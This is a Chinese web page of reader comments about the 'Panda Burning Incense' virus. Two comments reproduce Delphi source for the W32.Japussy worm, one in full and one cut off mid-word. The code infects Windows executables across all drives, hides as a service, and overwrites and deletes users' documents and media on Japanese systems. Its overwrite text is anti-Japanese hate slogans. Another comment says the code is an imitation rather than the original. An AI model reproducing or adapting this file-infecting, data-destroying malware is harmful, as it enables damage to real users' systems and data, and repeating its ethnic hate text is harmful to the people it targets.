当前位置：首页 > 资讯评论

熊猫烧香源码（熊猫烧香的技术含量）

全部评论(3)

qian
熊猫烧香-核心源码--------------------------------------------------------------------------------代码:--------------------------------------------------------------------------------程序代码programJapussy;usesWindows,SysUtils,Classes,Graphics,ShellAPI{,Registry};constHeaderSize=82432;//病毒体的大小IconOffset=$12EB8;//PE文件主图标的偏移量//在我的Delphi5SP1上面编译得到的大小，其它版本的Delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量{HeaderSize=38912;//Upx压缩过病毒体的大小IconOffset=$92BC;//Upx压缩过PE文件主图标的偏移量//Upx1.24W用法:upx-9--8086Japussy.exe}IconSize=$2E8;//PE文件主图标的大小--744字节IconTail=IconOffset+IconSize;//PE文件主图标的尾部ID=$44444444;//感染标记//垃圾码，以备写入Catchword='Ifaraceneedtobekilledout,itmustbeYamato.'+'Ifacountryneedtobedestroyed,itmustbeJapan!'+'***W32.Japussy.Worm.A***';{$R*.RES}functionRegisterServiceProcess(dwProcessID,dwType:Integer):Integer;stdcall;external'Kernel32.dll';//函数声明varTmpFile:string;Si:STARTUPINFO;Pi:PROCESS_INFORMATION;IsJap:Boolean=False;//日文操作系统标记{判断是否为Win9x}functionIsWin9x:Boolean;varVer:TOSVersionInfo;beginResult:=False;Ver.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);ifnotGetVersionEx(Ver)thenExit;if(Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS)then//Win9xResult:=True;end;{在流之间复制}procedureCopyStream(Src:TStream;sStartPos:Integer;Dst:TStream;dStartPos:Integer;Count:Integer);varsCurPos,dCurPos:Integer;beginsCurPos:=Src.Position;dCurPos:=Dst.Position;Src.Seek(sStartPos,0);Dst.Seek(dStartPos,0);Dst.CopyFrom(Src,Count);Src.Seek(sCurPos,0);Dst.Seek(dCurPos,0);end;{将宿主文件从已感染的PE文件中分离出来，以备使用}procedureExtractFile(FileName:string);varsStream,dStream:TFileStream;begintrysStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);trydStream:=TFileStream.Create(FileName,fmCreate);trysStream.Seek(HeaderSize,0);//跳过头部的病毒部分dStream.CopyFrom(sStream,sStream.Size-HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{填充STARTUPINFO结构}procedureFillStartupInfo(varSi:STARTUPINFO;State:Word);beginSi.cb:=SizeOf(Si);Si.lpReserved:=nil;Si.lpDesktop:=nil;Si.lpTitle:=nil;Si.dwFlags:=STARTF_USESHOWWINDOW;Si.wShowWindow:=State;Si.cbReserved2:=0;Si.lpReserved2:=nil;end;{发带毒邮件}procedureSendMail;begin//哪位仁兄愿意完成之？end;{感染PE文件}procedureInfectOneFile(FileName:string);varHdrStream,SrcStream:TFileStream;IcoStream,DstStream:TMemoryStream;iID:LongInt;aIcon:TIcon;Infected,IsPE:Boolean;i:Integer;Buf:array[0..1]ofChar;begintry//出错则文件正在被使用，退出ifCompareText(FileName,'JAPUSSY.EXE')=0then//是自己则不感染Exit;Infected:=False;IsPE:=False;SrcStream:=TFileStream.Create(FileName,fmOpenRead);tryfori:=0to$108do//检查PE文件头beginSrcStream.Seek(i,soFromBeginning);SrcStream.Read(Buf,2);if(Buf[0]=#80)and(Buf[1]=#69)then//PE标记beginIsPE:=True;//是PE文件Break;end;end;SrcStream.Seek(-4,soFromEnd);//检查感染标记SrcStream.Read(iID,4);if(iID=ID)or(SrcStream.Size<10240)then//太小的文件不感染Infected:=True;finallySrcStream.Free;end;ifInfectedor(notIsPE)then//如果感染过了或不是PE文件则退出Exit;IcoStream:=TMemoryStream.Create;DstStream:=TMemoryStream.Create;tryaIcon:=TIcon.Create;try//得到被感染文件的主图标(744字节)，存入流aIcon.ReleaseHandle;aIcon.Handle:=ExtractIcon(HInstance,PChar(FileName),0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream:=TFileStream.Create(FileName,fmOpenRead);//头文件HdrStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);try//写入病毒体主图标之前的数据CopyStream(HdrStream,0,DstStream,0,IconOffset);//写入目前程序的主图标CopyStream(IcoStream,22,DstStream,IconOffset,IconSize);//写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream,IconTail,DstStream,IconTail,HeaderSize-IconTail);//写入宿主程序CopyStream(SrcStream,0,DstStream,HeaderSize,SrcStream.Size);//写入已感染的标记DstStream.Seek(0,2);iID:=$44444444;DstStream.Write(iID,4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName);//替换宿主文件DstStream.Free;end;except;end;end;{将目标文件写入垃圾码后删除}procedureSmashFile(FileName:string);varFileHandle:Integer;i,Size,Mass,Max,Len:Integer;begintrySetFileAttributes(PChar(FileName),0);//去掉只读属性FileHandle:=FileOpen(FileName,fmOpenWrite);//打开文件trySize:=GetFileSize(FileHandle,nil);//文件大小i:=0;Randomize;Max:=Random(15);//写入垃圾码的随机次数ifMax<5thenMax:=5;Mass:=SizedivMax;//每个间隔块的大小Len:=Length(Catchword);whilei<MaxdobeginFileSeek(FileHandle,i*Mass,0);//定位//写入垃圾码，将文件彻底破坏掉FileWrite(FileHandle,Catchword,Len);Inc(i);end;finallyFileClose(FileHandle);//关闭文件end;DeleteFile(PChar(FileName));//删除之exceptend;end;{获得可写的驱动器列表}functionGetDrives:string;varDiskType:Word;D:Char;Str:string;i:Integer;beginfori:=0to25do//遍历26个字母beginD:=Chr(i+65);Str:=D+':';DiskType:=GetDriveType(PChar(Str));//得到本地磁盘和网络盘if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)thenResult:=Result+D;end;end;{遍历目录，感染和摧毁文件}procedureLoopFiles(Path,Mask:string);vari,Count:Integer;Fn,Ext:string;SubDir:TStrings;SearchRec:TSearchRec;Msg:TMsg;functionIsValidDir(SearchRec:TSearchRec):Integer;beginif(SearchRec.Attr<>16)and(SearchRec.Name<>'.')and(SearchRec.Name<>'..')thenResult:=0//不是目录elseif(SearchRec.Attr=16)and(SearchRec.Name<>'.')and(SearchRec.Name<>'..')thenResult:=1//不是根目录elseResult:=2;//是根目录end;beginif(FindFirst(Path+Mask,faAnyFile,SearchRec)=0)thenbeginrepeatPeekMessage(Msg,0,0,0,PM_REMOVE);//调整消息队列，避免引起怀疑ifIsValidDir(SearchRec)=0thenbeginFn:=Path+SearchRec.Name;Ext:=UpperCase(ExtractFileExt(Fn));if(Ext='.EXE')or(Ext='.SCR')thenbeginInfectOneFile(Fn);//感染可执行文件endelseif(Ext='.HTM')or(Ext='.HTML')or(Ext='.ASP')thenbegin//感染HTML和ASP文件，将Base64编码后的病毒写入//感染浏览此网页的所有用户//哪位大兄弟愿意完成之？endelseifExt='.WAB'then//Outlook地址簿文件begin//获取Outlook邮件地址endelseifExt='.ADC'then//Foxmail地址自动完成文件begin//获取Foxmail邮件地址endelseifExt='IND'then//Foxmail地址簿文件begin//获取Foxmail邮件地址endelsebeginifIsJapthen//是倭文操作系统beginif(Ext='.DOC')or(Ext='.XLS')or(Ext='.MDB')or(Ext='.MP3')or(Ext='.RM')or(Ext='.RA')or(Ext='.WMA')or(Ext='.ZIP')or(Ext='.RAR')or(Ext='.MPEG')or(Ext='.ASF')or(Ext='.JPG')or(Ext='.JPEG')or(Ext='.GIF')or(Ext='.SWF')or(Ext='.PDF')or(Ext='.CHM')or(Ext='.AVI')thenSmashFile(Fn);//摧毁文件end;end;end;//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑Sleep(200);until(FindNext(SearchRec)<>0);end;FindClose(SearchRec);SubDir:=TStringList.Create;if(FindFirst(Path+'*.*',faDirectory,SearchRec)=0)thenbeginrepeatifIsValidDir(SearchRec)=1thenSubDir.Add(SearchRec.Name);until(FindNext(SearchRec)<>0);end;FindClose(SearchRec);Count:=SubDir.Count-1;fori:=0toCountdoLoopFiles(Path+SubDir.Strings[i]+'',Mask);FreeAndNil(SubDir);end;{遍历磁盘上所有的文件}procedureInfectFiles;varDriverList:string;i,Len:Integer;beginifGetACP=932then//日文操作系统IsJap:=True;//去死吧！DriverList:=GetDrives;//得到可写的磁盘列表Len:=Length(DriverList);whileTruedo//死循环beginfori:=Lendownto1do//遍历每个磁盘驱动器LoopFiles(DriverList[i]+':','*.*');//感染之SendMail;//发带毒邮件Sleep(1000*60*5);//睡眠5分钟end;end;{主程序开始}beginifIsWin9xthen//是Win9xRegisterServiceProcess(GetCurrentProcessID,1)//注册为服务进程else//WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体自己ifCompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')=0thenInfectFiles//感染和发邮件else//已寄生于宿主程序上了，开始工作beginTmpFile:=ParamStr(0);//创建临时文件Delete(TmpFile,Length(TmpFile)-4,4);TmpFile:=TmpFile+#32+'.exe';//真正的宿主文件，多一个空格ExtractFile(TmpFile);//分离之FillStartupInfo(Si,SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile),PChar(TmpFile),nil,nil,True,0,nil,'.',Si,Pi);//创建新进程运行之InfectFiles;//感染和发邮件end;end.
2021-02-14 00:00:02

礼品代发源码
熊猫烧香并没有在互联网上公布完整的源代码。网上流传的都是类似于示意的代码。它们并不能编译通过。关键代码都已经略去。网上流传的版本是别人使用Delphi语言编写的模仿版，并非原作者写的。
2021-02-11 13:02:39

万岳科技
“熊猫烧香”源代码的解释,核心代码 program japussy; uses windows, sysutils, classes, graphics, shellapi{, registry}; const headersize = 82432; //病毒体的大小 iconoffset = $12eb8; //pe文件主图标的偏移量 //在我的delphi5 sp1上面编译得到的大小，其它版本的delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { headersize = 38912; //upx压缩过病毒体的大小 iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量 //upx 1.24w 用法: upx -9 --8086 japussy.exe } iconsize = $2e8; //pe文件主图标的大小--744字节 icontail = iconoffset + iconsize; //pe文件主图标的尾部 id = $44444444; //感染标记 //垃圾码，以备写入 catchword = 'if a race need to be killed out, it must be yamato. ' + 'if a country need to be destroyed, it must be japan! ' + '*** w32.japussy.worm.a ***'; {$r *.res} function registerserviceprocess(dwprocessid, dwtype: integer): integer; stdcall; external 'kernel32.dll'; //函数声明 var tmpfile: string; si: startupinfo; pi: process_information; isjap: boolean = false; //日文操作系统标记 { 判断是否为win9x } function iswin9x: boolean; var ver: tosversioninfo; begin result := false; ver.dwosversioninfosize := sizeof(tosversioninfo); if not getversionex(ver) then exit; if (ver.dwplatformid = ver_platform_win32_windows) then //win9x result := true; end; { 在流之间复制 } procedure copystream(src: tstream; sstartpos: integer; dst: tstream; dstartpos: integer; count: integer); var scurpos, dcurpos: integer; begin scurpos := src.position; dcurpos := dst.position; src.seek(sstartpos, 0); dst.seek(dstartpos, 0); dst.copyfrom(src, count); src.seek(scurpos, 0); dst.seek(dcurpos, 0); end; { 将宿主文件从已感染的pe文件中分离出来，以备使用 } procedure extractfile(filename: string); var sstream, dstream: tfilestream; begin try sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); try dstream := tfilestream.create(filename, fmcreate); try sstream.seek(headersize, 0); //跳过头部的病毒部分 dstream.copyfrom(sstream, sstream.size - headersize); finally dstr
2021-02-11 13:02:39

商品推荐